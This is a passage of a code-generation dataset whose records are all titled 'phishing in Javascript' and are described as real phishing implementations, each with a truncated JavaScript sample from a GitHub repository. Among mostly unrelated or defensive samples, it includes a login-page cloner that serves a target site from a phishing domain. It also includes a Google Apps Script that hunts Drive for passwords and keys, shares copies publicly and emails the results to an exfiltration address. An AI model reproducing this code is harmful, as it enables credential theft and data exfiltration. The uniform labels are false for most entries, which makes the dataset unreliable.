"sample_solution":"\/**\n * Created by IntelliJ IDEA.\n * User: Altryne\n * Date: Nov 20, 2010\n * Time: 4:55:41 AM\n * To change this template use File | Settings | File Templates.\n *\/\n\nvar intervall = 0;\n can_run_apps = false,\n folder_open = false,\n tick = '',\n doubleclickthreshhold = 200,\n isDblClick = false,\n canScroll = true,\n active_app = '';\n\n$('.page .delete,#dock .delete').live('click', function(event) {\n event.stopPropagation();\n event.stopImmediatePropagation();\n if(confirm('Are you sure you want to delete this app from you iPad?')){\n $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();\n $(this).siblings('.app_logo')\n .stop()\n .css('position','absolute')\n .animate({left:\"50%\",width:1,top:\"50%\",height: 1},'easeInQuint',function(){$(this).parent().remove()})\n }\n});\n$('#multitask_bar .delete').live('mousedown ', function(event) {\n event.stopPropagation();\n event.stopImmediatePropagation();\n $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();\n $(this).siblings('.app_logo')\n .stop()\n .css('position','absolute')\n .animate({left:\"50%\",width:1,top:\"50%\",height: 1},'easeInQuint',function(){\n _id = $(this).parent().attr('id');\n $('#'+_id+'_app').remove();\n $(this).parent().remove();\n if(!$('#multitask_bar li').length){\n closeMultitask(200);\n }\n })\n});\n\n$('.page.apps>li,#dock li').live('mousedown mouseup', function(event) {\n if (event.type == 'mousedown') {\n $(this).addClass('mousedown');\n if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) {\n can_run_apps = true;\n intervall = setTimeout(edit_mode, '1000');\n }else if($(this).hasClass('folder') && $('body').is('.editMode')){\n openFolder($(this).attr('id",
"language":"Javascript",
"repo_name":"altryne\/Ipad-Simulator",
"timestamp":"2025-05-22T22:01:01.825080",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/*\r\n * Copyright (c) 2021, Atheropids. All rights reserved.\r\n * \r\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n * SOFTWARE.\r\n *\/\r\n\r\n'use strict';\r\n\r\nconst https = require('https');\r\nconst readline = require('readline');\r\nconst tough = require('tough-cookie');\r\n\r\n\/\/ Spec holder class. Please see comments of member variables for details.\r\nclass PhishingServer {\r\n constructor(__domain, __entry_path = '\/', __login_page = '\/home\/login', __login_inbox = '\/login\/dologin') {\r\n\r\n \/\/ Target C&C server domain name.\r\n this.target_domain = __domain;\r\n\r\n \/\/ Remote path for server cookie init.\r\n this.entry_path = __entry_path;\r\n\r\n \/\/ Remote path of the phishing page.\r\n this.phishing_page_path = __login_page;\r\n\r\n \/\/ Remote path of the phishing data receiver.\r\n this.phishing_target_path = __login_inbox;\r\n }\r\n}\r\n\r\n\/*\r\n * Settings are here c:\r\n * Modify them on your purpose.\r\n *\/\r\n\r\n\/\/ List of malicious servers.\r\nlet spam_targets = [\r\n \/\/ [seized operation] new PhishingServer('steamcomrninuty.ru'),\r\n \/\/ [seized operation] new PhishingServer('steamcommnunmity.com', '\/id\/zxayonax'),\r\n \/\/ [seized operation] new PhishingServer('nitro-discord.ru', '\/airdrop'),\r\n \/\/ [seized operation] new PhishingServer('steamcommunity.link'),\r\n \/\/ [seized operation] new PhishingServer('discorcl.link'),\r\n new PhishingServer('steamcommmunilty.com', '\/tradoffer\/new\/?partner=406482431&token=lfk938iK'),\r\n new PhishingServer('discorrd.ru'),\r\n new PhishingServer('free-nitroos.ru'),\r\n new PhishingServer('discod.info', '\/nitro-gift'),\r\n new PhishingServer('d",
"language":"Javascript",
"repo_name":"Atheropids\/SteamComrninuty-Phish-Spammer",
"timestamp":"2025-05-22T22:01:02.005822",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"module.exports = [\n '2015',\n '2016',\n '2017',\n '2018',\n '2019',\n '2020',\n 'abuse',\n 'academy',\n 'accessibility',\n 'account',\n 'accountant',\n 'accounting',\n 'accountmanager',\n 'accountmanagers',\n 'accounts',\n 'accountspayable',\n 'acquisition',\n 'admin',\n 'admin1',\n 'administracao',\n 'administracion',\n 'administrador',\n 'administratie',\n 'administratif',\n 'administration',\n 'administrativo',\n 'administrator',\n 'administrators',\n 'admins',\n 'adminteam',\n 'admissions',\n 'adops',\n 'ads',\n 'adventure',\n 'advertise',\n 'advertising',\n 'advertisingsales',\n 'advice',\n 'advisor',\n 'advisors',\n 'adwords',\n 'affiliate',\n 'affiliates',\n 'agence',\n 'agencia',\n 'agency',\n 'agents',\n 'alarm',\n 'alarms',\n 'alert',\n 'alerts',\n 'alexa',\n 'all',\n 'all-employees',\n 'all-pms',\n 'all-staff',\n 'all-team',\n 'all-users',\n 'all.employees',\n 'all.staff',\n 'all.users',\n 'all_staff',\n 'alla',\n 'alle',\n 'allemployees',\n 'allhands',\n 'allsales',\n 'allstaff',\n 'allstudents',\n 'allteachers',\n 'allteam',\n 'allusers',\n 'alpha',\n 'alphas',\n 'alumni',\n 'ambassadors',\n 'amministrazione',\n 'analysts',\n 'analytics',\n 'android',\n 'angels',\n 'animation',\n 'announce',\n 'announcements',\n 'ap',\n 'api',\n 'app',\n 'apple',\n 'application',\n 'applications',\n 'apply',\n 'appointments',\n 'apps',\n 'archives',\n 'asistente',\n 'asset',\n 'assistanthead',\n 'assistencia',\n 'assistenza',\n 'associates',\n 'associates-all',\n 'ateam',\n 'atencionalcliente',\n 'atendimento',\n 'auctions',\n 'available',\n 'backend',\n 'backend-dev',\n 'backup',\n 'bd',\n 'benefits',\n 'berlin',\n 'bestellung',\n 'beta',\n 'biblioteca',\n 'bibliotheque',\n 'billing',\n 'bills',\n 'biuro',\n 'biz',\n 'bizdev',\n 'blog',\n 'board',\n 'bod',\n 'bookclub',\n 'booking',\n 'bookings',\n 'boston',\n 'boxoffice',\n 'brand',\n 'branding',\n 'brands',\n 'brandsolutions',\n 'broadcast',\n 'buchhaltung',\n 'bugs',\n 'build',\n 'bursar',\n 'busdev',\n 'business',",
"language":"Javascript",
"repo_name":"decal\/werdlists",
"timestamp":"2025-05-22T22:01:02.114023",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"page_src = \"https:\/\/login.vulnwebsite.com\/\";\nphishing_url=\"http:\/\/yourphishingdomain.com\/\";\n\nfunction doHTMLMagic(pageSource, baseURL, phishDomain) {\n\treplaceSrc = pageSource.replace('href=\"\/', \"href=\\\"\" + baseURL+ '\/');\n\treplaceSrc = replaceSrc.replace('src=\"\/', \"src=\\\"\" + baseURL+ '\/');\n\treplaceSrc = replaceSrc.replace('<head>', '<head><base href=\"' + phishDomain + '\">');\n\treturn replaceSrc;\n}\n\nfunction createCORSRequest(method, url) {\n var xhr = new XMLHttpRequest();\n if (\"withCredentials\" in xhr) {\n xhr.open(method, url, true);\n } else if (typeof XDomainRequest != \"undefined\") {\n xhr = new XDomainRequest();\n xhr.open(method, url);\n } else {\n xhr = null;\n }\n return xhr;\n}\n\nfunction makeCorsRequest(baseURL, phishDomain) {\n var url = 'https:\/\/cors-anywhere.herokuapp.com\/' + baseURL;\n\n var xhr = createCORSRequest('GET', url);\n if (!xhr) {\n return;\n }\n\n xhr.onload = function() {\n var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain)\n \tdocument.open();\n document.write(pageSourceStr);\n document.close();\n };\n\n xhr.send();\n}\n\nmakeCorsRequest(page_src, phishing_url);\nwindow.history.pushState(\"\", \"Login\", \"\/login\");",
"language":"Javascript",
"repo_name":"infosec-au\/phishJS",
"timestamp":"2025-05-22T22:01:02.254176",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const { Builder, By, until, Capabilities } = require(\"selenium-webdriver\")\nconst chrome = require(\"selenium-webdriver\/chrome\")\nconst url = require(\"url\")\nconst fs = require(\"fs\")\nconst crypto = require(\"crypto\")\nconst request = require(\"request\")\nconst path = require(\"path\")\nconst FormData = require(\"form-data\")\nconst proxy = require(\"selenium-webdriver\/proxy\")\nconst proxyChain = require(\"proxy-chain\")\nrequire('console-stamp')(console, {\n format: ':date(yyyy\/mm\/dd HH:MM:ss.l)'\n})\nrequire(\"dotenv\").config()\n\nconst extensionId = \"caacbgbklghmpodbdafajbgdnegacfmo\"\nconst CRX_URL = `https:\/\/clients2.google.com\/service\/update2\/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64`\nconst USER_AGENT =\n \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36\"\n\nconst USER = process.env.APP_USER || \"\"\nconst PASSWORD = process.env.APP_PASS || \"\"\nconst ALLOW_DEBUG = !!process.env.DEBUG?.length || false\nconst EXTENSION_FILENAME = \"app.crx\"\nconst PROXY = process.env.PROXY || undefined\n\nconsole.log(\"-> Starting...\")\nconsole.log(\"-> User:\", USER)\nconsole.log(\"-> Pass:\", PASSWORD)\nconsole.log(\"-> Proxy:\", PROXY)\nconsole.log(\"-> Debug:\", ALLOW_DEBUG)\n\nif (!USER || !PASSWORD) {\n console.error(\"Please set APP_USER and APP_PASS env variables\")\n process.exit()\n}\n\nif (ALLOW_DEBUG) {\n console.log(\n \"-> Debugging is enabled! This will generate a screenshot and console logs on error!\"\n )\n}\n\nasync function downloadExtension(extensionId) {\n const url = CRX_URL.replace(extensionId, extensionId)\n const headers = { \"User-Agent\": USER_AGENT }\n\n console.log(\"-> Downloading extension from:\", url)\n\n \/\/ if file exists and modify time is less than 1 day, skip download\n if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) {\n console.log(\"-> Extension already downloaded! skip download...\")\n return\n }\n\n return new ",
"language":"Javascript",
"repo_name":"web3bothub\/gradient-bot",
"timestamp":"2025-05-22T22:01:02.390815",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const SCALES = { URGENCY: 5, CONFRIM: 6 };\nconst TOTALSCALE = 20;\nconst THRESH = 0.33;\n\nfunction emailCheck(email) {\n let scale = 0;\n let idx = email.lastIndexOf(\"@\");\n id = email.slice(0, idx);\n dmn = email.slice(idx + 1);\n len1 = id.length;\n len2 = dmn.length;\n \/\/ Check Email ID for Number Count >= 3\n idNums = id.replace(\/\\D\/g, \"\");\n if (idNums && idNums.length >= 3) scale += 2;\n \/\/ Check Email Domain for Number Count > 0\n dmnNums = dmn.replace(\/\\D\/g, \"\");\n if (dmnNums && dmnNums.length > 0) scale += 2;\n \/\/ Check Email Domain for Common Domain\n let found = DOMAINS.find(d => d === dmn);\n if (!found) scale += 1;\n return scale;\n}\n\nfunction URLcheck(body) {\n url = body.match(\n \/[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b([-a-zA-Z0-9()@:%_\\+.~#?&\/\/=]*)\/\n );\n if (url) return 2;\n return 0;\n}\n\nfunction greetingCheck(greeting) {\n let scale = 0;\n for (i = 0; i < 3; i++) {\n let found = GREETINGS.find(greet => greeting[i] === greet);\n if (found) scale += 1;\n if (scale > 1) return 2;\n }\n return scale;\n}\n\nfunction urgencyCheck(word) {\n let found = URGENCY_WORDS.find(w => w === word);\n if (found) return 5 \/ 3;\n return 0;\n}\n\nfunction confirmCheck(word) {\n let found = CONFIRMING_WORDS.find(w => w === word);\n if (found) return 2;\n return 0;\n}\n\nfunction dictionaryCheck(body) {\n body = body\n .replace(\/[.,'\\\/#!$%\\^&\\*;:{}=\\-_`~()]\/g, \"\")\n .replace(\/\\r?\\n|\\r\/g, \" \"); \/\/ Remove special chars\n let words = body.split(\" \");\n words = words.filter(w => Boolean(w)); \/\/Remove falsey values\n let greeting = words.splice(0, 3);\n let grtScale = greetingCheck(greeting);\n let urgScale = 0;\n let cfmScale = 0;\n words.forEach(word => {\n if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word);\n if (cfmScale < SCALES.CONFRIM) cfmScale += confirmCheck(word);\n });\n return { grtScale, urgScale, cfmScale };\n}\n\nfunction phishCheck(email, body) {\n let eScale = emailCheck(email);\n let urlScale = URLcheck(body);\n let dictScale = dic",
"language":"Javascript",
"repo_name":"PhishersOfMen\/Assn5-Phishing-SQLI",
"timestamp":"2025-05-22T22:01:02.523095",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"#!\/usr\/bin\/env node\nconst fs = require('fs');\nconst debug = require('debug')('fuzz:main');\nconst Promise = require('bluebird');\nconst program = require('commander');\nconst request = require('request');\nconst libssdeep = require('ssdeep');\nconst csv = require('csv');\nconst ProgressBar = require('progress');\nconst CONF = require('.\/config');\nconst { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('.\/lib\/utils');\nconst { DomainFuzz, DomainDict, DomainThread } = require('.\/lib');\n\nconst fuzz = (opts, domains, worker) => {\n const total = domains.length;\n const bar = new ProgressBar('Running [:bar] :percent :etas', {\n complete: '=',\n incomplete: ' ',\n width: 50,\n total,\n });\n Promise\n .map(domains, (domain) => {\n bar.tick(1);\n return worker.run(domain);\n }, { concurrency: opts.concurrency })\n .then((result) => {\n if (opts.option_output) {\n let data;\n if (opts.option_format === 'JSON') {\n data = JSON.stringify(result, null, 4);\n fs.appendFile(opts.option_output, data, 'utf8', (err) => {\n if (err) printError(err.message);\n });\n } else if (opts.option_format === 'CSV') {\n data = [];\n const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score';\n data.push(columns.split(','));\n for (const domain of result) {\n data.push(columns.split(',').map(_ => domain[_]));\n }\n csv.stringify(data, (parseErr, res) => {\n fs.appendFile(this.option_output, res, 'utf8', (err) => {\n if (err) printError(err.message);\n });\n });\n }\n }\n for (const domain of result) {\n printResult(domain);\n }\n })\n .catch(err => printError(err.message));\n};\n\nconst main = () => {\n const opts = program\n .version(CONF.version)\n .usage('[options] DOMAIN')\n .description(`Find similar-loo",
"language":"Javascript",
"repo_name":"monkeym4ster\/DomainFuzz",
"timestamp":"2025-05-22T22:01:02.651975",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const fs = require(\"fs\");\n\n\/\/ load puppeteer\nconst puppeteer = require('puppeteer');\n\nconst window_height = 768;\nconst window_width = 1366;\nconst studio_url = \"https:\/\/studio.youtube.com\/\";\n\n\/\/ directory contains the videos you want to upload\nconst upload_file_directory = \"your video directory\";\n\/\/ change user data directory to your directory\nconst chrome_user_data_directory = \"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Chromium\\\\User Data\";\n\nconst title_prefix = \"video title prefix \";\nconst video_description = \"\";\n\nconst DEFAULT_ARGS = [\n '--disable-background-networking',\n '--enable-features=NetworkService,NetworkServiceInProcess',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-component-extensions-with-background-pages',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-extensions',\n \/\/ BlinkGenPropertyTrees disabled due to crbug.com\/937609\n '--disable-features=TranslateUI,BlinkGenPropertyTrees',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-sync',\n '--force-color-profile=srgb',\n '--metrics-recording-only',\n '--no-first-run',\n '--enable-automation',\n '--password-store=basic',\n '--use-mock-keychain',\n];\n\nlet files = [];\nfs.readdir(upload_file_directory, function (err, temp_files) {\n if (err) {\n console.log('Something went wrong...');\n return console.error(err);\n }\n for (let i = 0; i < temp_files.length; i++) {\n files.push(temp_files[i]);\n }\n});\n\ntry {\n (async () => {\n const browser = await puppeteer.launch(\n {\n 'headless': false, \/\/ have window\n executablePath: null,\n userDataDir: chrome_user_data_directory,\n ignoreDefaultArgs: ",
"language":"Javascript",
"repo_name":"last2win\/youtube-upload-multi-videos",
"timestamp":"2025-05-22T22:01:02.782934",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"import warning from '.\/station.svg'\nimport terra from '.\/terra.svg'\nimport '.\/fonts.css'\nimport '.\/App.css'\n\nconst SAFE_PAGE = 'https:\/\/station.money'\n\nfunction App() {\n if (!document.referrer || document.referrer === window.location.href) {\n \/\/window.location.href = SAFE_PAGE\n }\n\n if (document.referrer) {\n const { hostname } = new URL(document.referrer)\n if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) {\n return (\n <div className='app__terra'>\n <img src={terra} alt='Terra logo' \/>\n <h2>WARNING<\/h2>\n <p>\n <span className='url'>{hostname}<\/span> is currently\n unavailable. <br \/> Please visit{' '}\n <span className='url'>\n <a href='https:\/\/twitter.com\/terra_money'>\n twitter.com\/terra_money\n <\/a>\n <\/span>{' '}\n for updates.\n <\/p>\n <\/div>\n )\n }\n }\n\n return (\n <div className='App'>\n <img src={warning} alt='warning' \/>\n <h2>PHISHING ALERT<\/h2>\n <p>\n You are trying to visit <span className='url'>{document.referrer}<\/span>\n <br \/>\n which is a known scam website.\n <\/p>\n <span\n onClick={() => {\n window.location.href = SAFE_PAGE\n }}\n className='button__main'\n >\n Go back to safety\n <\/span>\n {\/*\n <a\n href={document.referrer}\n >\n Visit anyway\n <\/a>\n *\/}\n <\/div>\n )\n}\n\nexport default App\n",
"language":"Javascript",
"repo_name":"terra-money\/scam-alert-web",
"timestamp":"2025-05-22T22:01:02.912967",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const fs = require('fs')\nconst fsExtra = require('fs-extra')\nconst rmRf = require('rimraf')\n\nconst Streams = require('mississippi')\nconst bind = require('ap').partial\nconst async = require('.\/async')\n\nconst Browserify = require('browserify')\nconst watchify = require('watchify')\nconst sassStream = require('sass-css-stream')\n\n\n\n\nstart(function(err){\n if (err) throw err\n console.log('end')\n})\n\n\nfunction start(cb){\n async.series({\n clean,\n build,\n }, cb)\n}\n\nfunction clean(cb){\n fsExtra.remove('.\/dist\/', cb)\n}\n\nfunction build(cb){\n async.parallel({\n buildJs,\n buildCss,\n buildStatic,\n }, cb)\n}\n\nfunction buildJs(cb) {\n var browserify = Browserify({\n entries: ['.\/src\/js\/index.js'],\n cache: {},\n packageCache: {},\n \/\/ plugin: [watchify],\n })\n\n browserify.on('update', bundle)\n\n async.series({\n buildJsPrep: bind(fsExtra.mkdirs, '.\/dist\/js'),\n buildJsStart: start,\n }, cb)\n\n function start(cb){\n var firstBundle = bundle()\n Streams.finished(firstBundle, cb)\n }\n\n function bundle() {\n console.log('bundle')\n return Streams.pipeline(\n browserify.bundle(),\n fs.createWriteStream('.\/dist\/js\/bundle.js')\n )\n }\n}\n\nfunction buildCss(cb) {\n\n async.series({\n buildCssPrep: bind(fsExtra.mkdirs, '.\/dist\/css'),\n buildCssStart: start,\n }, cb)\n\n function start(cb) {\n var pipeline = Streams.pipeline(\n fs.createReadStream( '.\/src\/css\/index.scss' ),\n sassStream( '.\/src\/css\/index.scss' ),\n fs.createWriteStream( '.\/dist\/css\/bundle.css' )\n )\n Streams.finished(pipeline, cb)\n }\n}\n\nfunction buildStatic(cb) {\n\n async.parallel({\n imgs: bind(fsExtra.copy, '.\/src\/img\/', '.\/dist\/img\/'),\n faviconAndroid: bind(fsExtra.copy, '.\/src\/manifest.json', '.\/dist\/manifest.json'),\n faviconIE: bind(fsExtra.copy, '.\/src\/browserconfig.xml', '.\/dist\/browserconfig.xml'),\n fonts: bind(fsExtra.copy, '.\/src\/fonts\/', '.\/dist\/fonts\/'),\n index: bind(fsExtra.copy, '.\/src\/index.html'",
"language":"Javascript",
"repo_name":"409H\/landing",
"timestamp":"2025-05-22T22:01:03.059650",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/ Created by Greg Carson @ Feb 2017\n\/\/ ---------------------------------------\n\/\/ Play nice and use for security training\n\/\/ and testing.\n\nfunction drivePassSearch() {\n \n \/\/ This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context.\n \/\/ This can be disabled for Google Apps for Business users:\n \/\/ https:\/\/support.google.com\/a\/answer\/60781?hl=en\n \/\/ Personal users shit out of luck? Not sure haven't looked into it.\n \n var folder = DriveApp.createFolder('Evil Folder');\n folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);\n \n \/\/ Construct malicious search query on drive. Look for PDFs? DOC\/XLS files? If you are looking for an extension use 'title contains'\n \/\/ If you want to search through content for a keyword use 'fullText contains' instead\n \/\/ You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image\/' or mimeType contains 'video\/')'\n \/\/ Not aware of case sensitivity or ability to perform regular expressions\n \/\/ Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit \n \/\/ or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera\n \n var files = DriveApp.searchFiles(\n 'modifiedDate > \"2013-02-28\" and title contains \"SEARCHTERMHERE\"');\n while (files.hasNext()) {\n var file = files.next();\n Logger.log(file.getDownloadUrl());\n Logger.log(file.getUrl());\n Logger.log(file.getName());\n var name = file.getName();\n file.makeCopy(name,folder);\n Logger.log(file.getDownloadUrl());\n Logger.log(file.getUrl());\n \n }\n\n \/\/ Write Logger data to body of email and send to specified recipient\n \/\/ Sender address is the current active user\n \n Logger.log(folder.getUrl());\n var recipient = \"RECPIENT-EXFIL-EMAIL-ADDRESS-HERE\";\n var subject = 'Google Drive Query - KDBX';\n var body = Logger.getLog();\n MailApp.sendEmail(recipient, subj",
"language":"Javascript",
"repo_name":"gregkcarson\/GoogleAppScriptSE",
"timestamp":"2025-05-22T22:01:03.220189",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const express = require(\"express\");\nconst app = express();\nconst http = require(\"http\");\nconst server = http.createServer(app);\nconst puppeteer = require('puppeteer');\nconst port = 9001;\nvar browser;\napp.use(express.json())\napp.post('\/bot\/url', function(req, res) {\n res.setHeader('Content-Type', 'application\/json');\n console.log(req.body);\n let url = req.body.url\n console.log(url);\n startBot(url)\n .then(() => {\n res.send({\n message: 'success',\n data: req.body\n })\n })\n .catch((err) => {\n res.send({\n message: 'failed',\n error: err\n })\n })\n})\nasync function startBot(url) {\n console.log(browser);\n if(typeof browser !== 'undefined'){\n await browser.close()\n }\n const minimal_args = [\n '--autoplay-policy=user-gesture-required',\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-component-update',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-domain-reliability',\n '--disable-extensions',\n '--disable-features=AudioServiceOutOfProcess',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-notifications',\n '--disable-offer-store-unmasked-wallet-cards',\n '--disable-popup-blocking',\n '--disable-print-preview',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-setuid-sandbox',\n '--disable-speech-api',\n '--disable-sync',\n '--hide-scrollbars',\n '--ignore-gpu-blacklist',\n '--metrics-recording-only',\n '--mute-audio',\n '--no-default-browser-check',\n '--no-first-run',\n '--no-pings',\n '--no-sandbox',\n '--no-zygote',\n '--password-store=basic',\n '--use-gl=swiftshader',\n '--use-mock-keychain',\n ];\n console.log(\"Launching Headless Browser::::::::::::\");\n browser = await puppeteer.launch({\n ",
"language":"Javascript",
"repo_name":"arunjohn96\/webndi",
"timestamp":"2025-05-22T22:01:03.383520",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"import React from 'react';\nimport {\n Route,\n Switch\n} from 'react-router-dom';\n\n\nconst isBrowser = typeof window !== \"undefined\" && typeof window.document !== \"undefined\";\nconst dummy = () => {};\n\n\nconst HelpTextPage = isBrowser? React.lazy(() => import(\".\/components\/helpText\")): dummy;\nconst WebhookPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_dashboard\/server_view\")): dummy;\nconst ManagerRootPage = isBrowser? React.lazy(() => import(\".\/pages\/emote_manager\/manager_root\")): dummy;\nconst LoginPage = isBrowser? React.lazy(() => import(\".\/pages\/login\")): dummy;\nconst InvitePage = isBrowser? React.lazy(() => import(\".\/pages\/invite\")): dummy;\nconst PrivacyPolicy = isBrowser? React.lazy(() => import(\".\/pages\/policy\")): dummy;\nconst GuildCreatorPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_builder\")): dummy;\nconst GuildSelectorPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_selector\")): dummy;\nconst GuildStatusPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_status\")): dummy;\nconst LicensePage = isBrowser? React.lazy(() => import(\".\/pages\/licenses\")): dummy;\nconst CommandPage = isBrowser? React.lazy(() => import(\".\/pages\/commands\")): dummy;\nconst BotAddedPage = isBrowser? React.lazy(() => import(\".\/pages\/bot_added\")): dummy;\nconst PremiumPage = isBrowser? React.lazy(() => import(\".\/pages\/premium\")): dummy;\nconst PublicPackSearchPage = isBrowser? React.lazy(() => import(\".\/pages\/public_packs\/search\")): dummy;\nconst PublicPackPage = isBrowser? React.lazy(() => import(\".\/pages\/public_packs\/view\")): dummy;\nconst PhishingPage = isBrowser? React.lazy(() => import(\".\/pages\/phishing\")): dummy;\nconst TermsPage = isBrowser? React.lazy(() => import(\".\/pages\/terms\")): dummy;\n\n\nexport const FullRouter = ({loggedIn, HomePage}) => {\n return (\n <React.Suspense fallback={<div>Loading Page...<\/div>}>\n {!loggedIn && <LoggedOutRouter HomePage={HomePage}\/>}\n {loggedIn && <LoggedInRouter HomePage={H",
"language":"Javascript",
"repo_name":"NQN-Discord\/NQNFrontend",
"timestamp":"2025-05-22T22:01:03.529662",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const maxConfigItems = 600\r\nconst maxPerType = 300\r\nconst includeOriginalConfigs = 0\r\n\r\nconst subLinks = [\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/trojan.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/ss.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2Hub\/main\/Split\/Base64\/shadowsocks\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2Hub2\/main\/Split\/Base64\/vmess\",\r\n \"https:\/\/raw.githubusercontent.com\/NiREvil\/vless\/main\/sub\/freedom\"\r\n]\r\nconst cnfLinks = [\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/vmess.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/vmess_iran.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/trojan_iran.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/ss_iran.txt\"\r\n]\r\nconst cleanIPLink = \"https:\/\/raw.githubusercontent.com\/coldwater-10\/clash_rules\/main\/List%20of%20clean%20IPs.txt\"\r\nconst operatorList = [\"AST\", \"HWB\", \"IRC\", \"MBT\", \"MCI\", \"MKB\", \"PRS\", \"RTL\", \"SHT\", \"ZTL\", \"PIS\", \"DAT\", \"SAB\", \"ASR\", \"FAN\", \"ZTL\", \"SFR\", \"DID\", \"LAY\", \"MAH\", \"TAK\", \"PET\", \"AND\", \"RES\", \"AFR\", \"ARA\", \"SAM\", \"APT\", \"ALL\", \"PLUS\", \"TEST\", \"ENG\", \"FA\", \"IPV6\", \"IRCF\", \"ANTY\"]\r\nconst addressList = [\"discord.com\", \"cloudflare.com\", \"nginx.com\", \"cdnjs.com\", \"vimeo.com\", \"networksolutions.com\"]\r\nconst fpList = [\"chrome\", \"chrome\", \"chrome\", \"firefox\", \"safari\", \"edge\", \"ios\", \"android\", \"360\", \"qq\", \"random\", \"random\"]\r\nconst alpnList = [\"http\/1.1\", \"h2,http\/1.1\", 